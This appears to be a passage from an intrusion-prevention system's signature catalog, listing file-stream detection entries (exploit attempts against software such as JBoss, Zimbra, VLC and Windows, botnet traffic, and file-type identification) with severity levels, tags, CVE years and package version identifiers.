First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-759-5211
Vulnerability: Red-Hat-Installation-Package
File-Type-Identification
Description:
Back to top

File-Binary_Red-Hat-Jboss-Application-Server-Dofilter-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Red Hat JBoss Enterprise Application Platform detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Red Hat JBoss Enterprise Application Platform, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1020-5242
Last changed: sgpkg-ips-1023-5242
Vulnerability: Red-Hat-Jboss-Application-Server-Dofilter-Insecure-Deserialization
Description:
Back to top

File-Binary_Remote-Code-Execution-Via-Cpio-In-Zimbra-Collaboration-Suite-CVE-2022-41352

About this situation: An attempt to exploit a vulnerability in Zimbra Collaboration Suite detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zimbra Collaboration Server, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1515-5242
Last changed: sgpkg-ips-1605-5242
Vulnerability: Remote-Code-Execution-Via-Cpio-In-Zimbra-Collaboration-Suite-CVE-2022-41352
Description:
Back to top

File-Binary_Rockwell-Automation-ISaGRAF-Workbench-7-ZIP-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Rockwell Automation ISaGRAF Workbench detected.
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Rockwell Automation ISaGRAF Workbench, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1494-5242
Last changed: sgpkg-ips-1582-5242
Vulnerability: Rockwell-Automation-ISaGRAF-Workbench-7-ZIP-Directory-Traversal
Description:
Back to top

File-Binary_Rockwell-Automation-Workbench-CCWARC-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Rockwell Automation Connected Components Workbench detected.
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Rockwell Automation Connected Components Workbench, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1501-5242
Last changed: sgpkg-ips-1503-5242
Vulnerability: Rockwell-Automation-Workbench-CCWARC-Insecure-Deserialization
Description:
Back to top

File-Binary_Romfs-Disk-Image

About this situation: Romfs disk image file download detected
Context: Other Binary File Stream
Severity: 2
Tags: Linux, Any Hardware, Linux not specific, Possibly Unwanted Content, Archive
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_Rpm-Package-Manager-Cpio-Header-Namesize-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Red Hat RPM Package Manager detected
Context: Other Binary File Stream
Severity: 7
Tags: Linux, Any Hardware, Red Hat RPM Package Manager, CVE2014, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Vulnerability: Rpm-Package-Manager-Cpio-Header-Namesize-Integer-Overflow
Description:
Back to top

File-Binary_Sality-NonP2P-A-Botnet-Traffic

About this situation: Sality-NonP2P botnet traffic detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1125-5242
Vulnerability: Botnet-Sality_NonP2P
Description:
Back to top

File-Binary_SAP-3d-Visual-Enterprise-Viewer-3dm-File-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in SAP 3D Visual Enterprise Viewer detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SAP 3D Visual Enterprise Viewer, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-704-5211
Vulnerability: SAP-3d-Visual-Enterprise-Viewer-3dm-File-Buffer-Overflow
Description:
Back to top

File-Binary_SAP-3d-Visual-Enterprise-Viewer-Flic-Animation-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in SAP 3D Visual Enterprise Viewer detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SAP 3D Visual Enterprise Viewer, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-870-5242
Vulnerability: SAP-3d-Visual-Enterprise-Viewer-Flic-Animation-Buffer-Overflow
Description:
Back to top

File-Binary_Schneider-Electric-ClearSCADA-Opf-File-Parsing-Out-Of-Bounds-Array-Indexing

About this situation: An attempt to exploit a vulnerability in Schneider Electric ClearSCADA 2010 detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric ClearSCADA, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-578-5211
Vulnerability: Schneider-Electric-ClearSCADA-Opf-File-Parsing-Out-Of-Bounds-Array-Indexing
Description:
Back to top

File-Binary_Schneider-Electric-Gp-Pro-EX-Parseapi-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Schneider Electric GP-Pro EX detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric GP-Pro EX, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-744-5211
Last changed: sgpkg-ips-744-5211
Vulnerability: Schneider-Electric-Gp-Pro-EX-Parseapi-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_Shared-Variables

About this situation: This fingerprint sets shared variables
Context: Other Binary File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1860-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

File-Binary_SketchUp-Pict-File-CVE-2013-3664

About this situation: A suspicious binary file detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-847-5242
Last changed: sgpkg-ips-847-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-Binary_Smokeloader-A-Botnet-Traffic

About this situation: Smokeloader botnet traffic detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1125-5242
Vulnerability: Botnet-Smokeloader
Description:
Back to top

File-Binary_Smokeloader-C-Botnet-Traffic

About this situation: Smokeloader botnet traffic detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1125-5242
Vulnerability: Botnet-Smokeloader
Description:
Back to top

File-Binary_Sophos-Anti-Virus-Cab-File-Invalid-Folder-Count-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in Sophos Anti-Virus detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Sophos Anti-Virus, CVE2006, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-413-4219
Vulnerability: Sophos-Anti-Virus-Cab-File-Invalid-Folder-Count-Heap-Overflow
Description:
Back to top

File-Binary_Sophos-Anti-Virus-CHM-File-Heap-Overflow

About this situation: Malicious compressed help file detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Sophos Anti-Virus, CVE2006, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: HTTP-Sophos-Anti-Virus-CHM-File-Heap-Oveflow
Description:
Back to top

File-Binary_Standard-MIDI-Download

About this situation: Detected a download of Standard MIDI audio file
Context: Other Binary File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Streaming Protocols, Media File
First detected in: sgpkg-ips-449-4219
Last changed: sgpkg-ips-449-4219
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_StuffIt-Archive

About this situation: StuffIt archive file download detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, StuffIt, Any Operating System not specific, Possibly Unwanted Content, Archive
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_Sun-Java-Runtime-Environment-Classloader-Privilege-Escalation

About this situation: Malicious Java applet detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, CVE2002, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: HTTP-Sun-Java-Runtime-Environment-Classloader-Privilege-Escalation
Description:
Back to top

File-Binary_Sun-Java-Runtime-Environment-Pack200-Decompression-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Sun Microsystems Java Runtime Environment (JRE) detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Sun Java Development Kit, CVE2008, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: Sun-Java-Runtime-Environment-Pack200-Decompression-Integer-Overflow
Description:
Back to top

File-Binary_Sun-JRE-Pack200-Decompression-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Sun Microsystems Java Development Kit (JDK) detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Sun Java Development Kit, CVE2009, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-973-5242
Vulnerability: Sun-JRE-Pack200-Decompression-Integer-Overflow
Description:
Back to top

File-Binary_Sun-Microsystems-Java-Gif-File-Handling-Memory-Corruption

About this situation: Attempt to exploit memory corruption vulnerability in Sun JRE detected
Context: Other Binary File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, CVE2007, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Sun-Microsystems-Java-Gif-File-Handling-Memory-Corruption
Description:
Back to top

File-Binary_SunBurst-TEARDROP-Detected-2

About this situation: Executable matching the TEARDROP tool detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1307-5242
Last changed: sgpkg-ips-1307-5242
Vulnerability: Solarwinds-SunBurst-Traffic
Description:
Back to top

File-Binary_Suspicious-File

About this situation: A suspicious binary file detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-1789-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-Binary_Suspicious-File-Name-In-Tar-Archive

About this situation: A suspicious TAR archive detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1605-5242
Last changed: sgpkg-ips-1606-5242
Vulnerability: Pear-Archive-Tar-Phar-Protocol-Handling-Deserialization-Code-Execution
Pear-Archive-Tar-File-Protocol-Handling-Arbitrary-File-Overwrite
Description:
Back to top

File-Binary_Suspicious-Filename-In-Gzip-Compressed-Archive

About this situation: A suspicious filename in gzip compressed archive was detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, BitDefender Internet Security, CVE2009, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: BitDefender-Internet-Security-Filename-Cross-Script-Script-Code-Execution
Description:
Back to top

File-Binary_Suspicious-Java-Serialized-Object

About this situation: A suspicious Java serialized object detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1540-5242
Last changed: sgpkg-ips-1842-5242
Vulnerability: Ysoserial-Generated-Java-Serialized-Object
Description:
Back to top

File-Binary_Suspicious-Link-Name-In-Tar-Archive

About this situation: A suspicious TAR archive detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2020, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1605-5242
Last changed: sgpkg-ips-1605-5242
Vulnerability: Pear-Archive-Tar-Symbolic-Link-Handling-Arbitrary-File-Overwrite
Remote-Code-Execution-Via-Cpio-In-Zimbra-Collaboration-Suite-CVE-2022-41352
Description:
Back to top

File-Binary_Suspicious-Long-Name-In-Gnu-Tar-Archive

About this situation: A suspicious TAR archive detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2021, CVE2022, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1605-5242
Last changed: sgpkg-ips-1605-5242
Vulnerability: VMware-Vcenter-Server-Remote-Code-Execution-CVE-2021-21972
OpenSSL-C_rehash-Script-CVE-2022-2068-Command-Injection-Vulnerability
Barracuda-ESG-Archive-Name-Validation-Vulnerability-CVE-2023-2868
Description:
Back to top

File-Binary_Suspiciously-Large-Windows-Script-File

About this situation: A transfer of a suspiciously large Windows script file detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1863-5242
Last changed: sgpkg-ips-1863-5242
Vulnerability: Suspiciously-Large-Windows-Script-File
Description:
Back to top

File-Binary_Symantec-AntiVirus-Engine-Rar-Decompression-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Norton Security detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Norton Internet Security, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-842-5242
Last changed: sgpkg-ips-842-5242
Vulnerability: Symantec-AntiVirus-Engine-Rar-Decompression-Remote-Code-Execution
Description:
Back to top

File-Binary_Symantec-AVE-Malformed-PE-Header-Memory-Access-Violation

About this situation: An attempt to exploit a vulnerability in Symantec AntiVirus Engine detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec AntiVirus Engine, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-775-5211
Last changed: sgpkg-ips-775-5211
Vulnerability: Symantec-AVE-Malformed-PE-Header-Memory-Access-Violation
Description:
Back to top

File-Binary_Tar-Archive

About this situation: Tar archive file download detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, GNU Tar, Any Operating System not specific, Possibly Unwanted Content, Archive
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-775-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_Telestream-Flip4Mac-WMV-File-Parsing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Telestream Flip4Mac detected
Context: Other Binary File Stream
Severity: 7
Tags: Mac OS X, Any Hardware, Apple QuickTime, CVE2007, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-585-5211
Last changed: sgpkg-ips-585-5211
Vulnerability: Flip4Mac-WMV-File-Parsing-Memory-Corruption
Description:
Back to top

File-Binary_TIFF-File

About this situation: Detected transfer of TIFF file
Context: Other Binary File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, MS2013-12, CVE2013, Any Operating System not specific, Protocol Information, Media File
First detected in: sgpkg-ips-552-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Microsoft-Windows-And-Office-TIFF-Handling-GDI-Memory-Corruption
Description:
Back to top

File-Binary_Tinba-Botnet-Traffic

About this situation: Tinba botnet traffic detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-753-5211
Last changed: sgpkg-ips-825-5242
Vulnerability: Tinba-Bot
Description:
Back to top

File-Binary_TomcatAJP-Request-Smuggling

About this situation: An attempt to exploit a vulnerability in Tomcat AJP detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Tomcat, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1645-5242
Last changed: sgpkg-ips-1646-5242
Vulnerability: TomcatAJP-Request-Smuggling-CVE-2022-26377
Description:
Back to top

File-Binary_Trimble-Navigation-SketchUp-BMP-File-Buffer-Overflow

About this situation: Trimble Navigation SketchUp BMP File Buffer Overflow detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, SketchUp, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-571-5211
Last changed: sgpkg-ips-1617-5242
Vulnerability: Trimble-Navigation-SketchUp-BMP-File-Buffer-Overflow
Description:
Back to top

File-Binary_Trimble-Navigation-SketchUp-Pict-File-Buffer-Overflow-2

About this situation: Trimble Navigation SketchUp PICT File Buffer Overflow detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, SketchUp, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-571-5211
Last changed: sgpkg-ips-1611-5242
Vulnerability: Trimble-Navigation-SketchUp-BMP-File-Buffer-Overflow
Description:
Back to top

File-Binary_Unidentified-Binary-From-A-Suspicious-Site

About this situation: Detected a suspicious Binary file
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-892-5242
Last changed: sgpkg-ips-892-5242
Description:
Back to top

File-Binary_UPX-Packed-ELF-Executable

About this situation: A suspicious executable file was detected
Context: Other Binary File Stream
Severity: 2
Tags: Linux, Any Hardware, Linux not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-1221-5242
Last changed: sgpkg-ips-1221-5242
Vulnerability: UPX-Packed-ELF-Executable
Description:
Back to top

File-Binary_VideoLAN-VLC-Media-Player-Subtitle-Striptags-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in VideoLAN VLC Media Player detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1025-5242
Vulnerability: VideoLAN-VLC-Media-Player-Subtitle-Striptags-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_VideoLAN-VLC-Real.c-Readrealindex-Real-Demuxer-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in VideoLAN VLC detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, CVE2008, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: VideoLAN-VLV-Real.c-Readrealindex-Real-Demuxer-Integer-Overflow
Description:
Back to top

File-Binary_VideoLAN-VLC-Ty-Processing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Videolan VLC detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, CVE2008, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1431-5242
Vulnerability: VideoLAN-VLC-Ty-Processing-Buffer-Overflow
Description:
Back to top

File-Binary_VLC-Media-Player-Plugins-Format-String-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in VideoLAN VLC detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, CVE2007, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-1398-5242
Vulnerability: VLC-Media-Player-Plugins-Format-String-Vulnerabilities
Description:
Back to top

File-Binary_VMware-Aria-Operations-For-Logs-Insecure-Deserialization-CVE-2023-20864

About this situation: An attempt to exploit a vulnerability in VMWare Aria Operations for Logs detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VMware Cloud Foundation, VMware Aria Operations for Logs, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1583-5242
Last changed: sgpkg-ips-1603-5242
Vulnerability: VMware-Aria-Operations-For-Logs-Insecure-Deserialization-CVE-2023-20864
Description:
Back to top

File-Binary_VMware-Virtual-Disk-Image

About this situation: VMware virtual disk image file download detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, EMC VMware, Any Operating System not specific, EMC VMware not specific, Possibly Unwanted Content, Archive
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_Wecon-LeviStudioU-Hft-File-Parsing-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wecon LeviStudioU detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1299-5242
Last changed: sgpkg-ips-1299-5242
Vulnerability: Wecon-LeviStudioU-Hft-File-Parsing-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_Wecon-LeviStudioU-Hft-File-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in WECON LeviStudioU detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1320-5242
Last changed: sgpkg-ips-1320-5242
Vulnerability: Wecon-LeviStudioU-Hft-File-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_Weintek-Easybuilder-Pro-Cmt-Series-Project-File-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Weintek EasyBuilder Pro cMT Series detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Weintek EasyBuilder Pro cMT Series, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1566-5242
Vulnerability: Weintek-Easybuilder-Pro-Cmt-Series-Project-File-Directory-Traversal
Description:
Back to top

File-Binary_WellinTech-KingView-Kingmess-Log-File-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in WellinTech KingView detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WellinTech KingView, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-760-5211
Vulnerability: WellinTech-KingView-Kingmess-Log-File-Parsing-Buffer-Overflow
Description:
Back to top

File-Binary_Win32-OTF-Validation-Vulnerability

About this situation: An attempt to exploit a vulnerability in Adobe Font Driver detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2011-06, CVE2011, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Win32-OTF-Validation-Vulnerability
Description:
Back to top

File-Binary_Winamp-Id3v2-Tag-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in NullSoft Winamp detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Winamp, CVE2005, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Winamp-Id3v2-Tag-Handling-Buffer-Overflow
Description:
Back to top

File-Binary_Windows-Control-Panel-Applet-Shortcut-File-Transfer

About this situation: Transfer of a Windows Control Panel Applet shortcut file detected
Context: Other Binary File Stream
Severity: 2
Tags: Windows, Any Hardware, MS2010-08, CVE2010, Windows not specific, Other Suspicious Traffic, Anomalies, Program File
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-522-5211
Vulnerability: Windows-Shell-Shortcut-Arbitrary-Code-Execution
File-Type-Identification
Description:
Back to top

File-Binary_Windows-Cryptographic-Services-Remote-Code-Execution-CVE-2023-23416

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2023-03, CVE2023, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1565-5242
Last changed: sgpkg-ips-1565-5242
Vulnerability: Windows-Cryptographic-Services-Remote-Code-Execution-CVE-2023-23416
Description:
Back to top

File-Binary_Windows-Elevation-Of-Privilege-CVE-2017-0024

About this situation: An attempt to exploit a vulnerability in Microsoft Windows
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2017-03, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Windows-Elevation-Of-Privilege-CVE-2017-0024
Description:
Back to top

File-Binary_Windows-Elevation-Of-Privilege-CVE-2017-0026

About this situation: An attempt to exploit a vulnerability in Microsoft Windows
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2017-03, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Windows-Elevation-Of-Privilege-CVE-2017-0026
Description:
Back to top

File-Binary_Windows-Elevation-Of-Privilege-CVE-2017-0050

About this situation: An attempt to exploit a vulnerability in Microsoft Windows
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2017-03, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Windows-Elevation-Of-Privilege-CVE-2017-0050
Description:
Back to top

File-Binary_Windows-Explorer-LNK-Remote-Code-Execution-Vulnerability-CVE-2017-8464

About this situation: An attempt to exploit a vulnerability in Windows Explorer detected
Context: Other Binary File Stream
Severity: 10
Tags: Windows, Any Hardware, MS2017-06, CVE2017, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-930-5242
Last changed: sgpkg-ips-931-5242
Vulnerability: Windows-Explorer-LNK-Remote-Code-Execution-Vulnerability-CVE-2017-8464
Description:
Back to top

File-Binary_Windows-Graphics-Rendering-Engine-BMP-File-Parsing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Digital Image Suite detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2008-09, CVE2008, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Windows-Graphics-Rendering-Engine-BMP-File-Parsing-Integer-Overflow
Description:
Back to top

File-Binary_Windows-HTML-Platforms-Security-Feature-Bypass-CVE-2025-21269

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2025-01, CVE2025, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1824-5242
Last changed: sgpkg-ips-1824-5242
Vulnerability: Windows-HTML-Platforms-Security-Feature-Bypass-CVE-2025-21269
Description:
Back to top

File-Binary_Windows-LNK-File-Transfer

About this situation: Transfer of a Windows LNK file detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-08, CVE2010, Windows not specific, Suspected Attack Related Anomalies, Anomalies, Program File, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-514-5211
Last changed: sgpkg-ips-1092-5242
Vulnerability: Windows-Shell-Shortcut-Arbitrary-Code-Execution
File-Type-Identification
Description:
Back to top

File-Binary_Windows-Mark-Of-The-Web-Security-Feature-Bypass-CVE-2025-24061

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2025-03, CVE2025, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1847-5242
Last changed: sgpkg-ips-1847-5242
Vulnerability: Windows-Mark-Of-The-Web-Security-Feature-Bypass-CVE-2025-24061
Description:
Back to top

